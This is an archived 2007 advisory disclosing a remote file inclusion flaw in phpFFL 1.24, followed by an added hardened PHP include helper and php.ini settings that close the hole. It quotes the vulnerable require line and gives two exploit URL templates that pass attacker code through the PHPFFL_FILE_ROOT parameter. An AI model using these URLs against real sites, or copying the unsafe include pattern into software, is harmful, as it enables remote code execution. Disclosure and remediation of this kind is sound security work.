phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities

2007-09-14 00:00:00

*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
# Author : Dj7xpl
# Contact : [email protected]
# Download : http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");


[[Remote]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""


Fixes

No fixes
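
A hardened form of the require shown under "Vuln Code", as an added example that is not phpFFL's own code or a vendor patch. It assumes the including script sits in program_files/livedraft/ under the application root, as the URLs above indicate; phpffl_safe_path() and PHPFFL_ROOT_DIR are hypothetical names.

```php
<?php
// Added example, not phpFFL code. Intended to replace the require at the top
// of livedraft.php and admin.php.
//
// Vulnerable pattern from the advisory: $PHPFFL_FILE_ROOT is not set by the
// script itself, so with register_globals enabled PHP fills it from the
// query string and the include prefix is under the requester's control.
//   require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");

/**
 * Resolve $relative under $root and refuse anything that is not an existing
 * local file inside that root. (Hypothetical helper.)
 */
function phpffl_safe_path($root, $relative)
{
    // realpath() only resolves local filesystem paths; a URL or a missing
    // file yields false.
    $rootReal = realpath($root);
    $fileReal = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($rootReal === false || $fileReal === false) {
        throw new RuntimeException('include target not found');
    }
    // After symlinks and ../ are resolved, the file must still be in the root.
    if (strpos($fileReal, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include target outside application root');
    }
    return $fileReal;
}

// The root is derived from this file's own location, never from request data.
// Assumption: this script is <root>/program_files/livedraft/<script>.php,
// so three dirname() calls reach <root>.
define('PHPFFL_ROOT_DIR', dirname(dirname(dirname(__FILE__))));

require phpffl_safe_path(PHPFFL_ROOT_DIR, 'program_files/livedraft/sajax.php');
```

Independently of the code change, setting register_globals = Off and allow_url_include = Off in php.ini removes both the variable injection and the remote fetch that this issue depends on.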
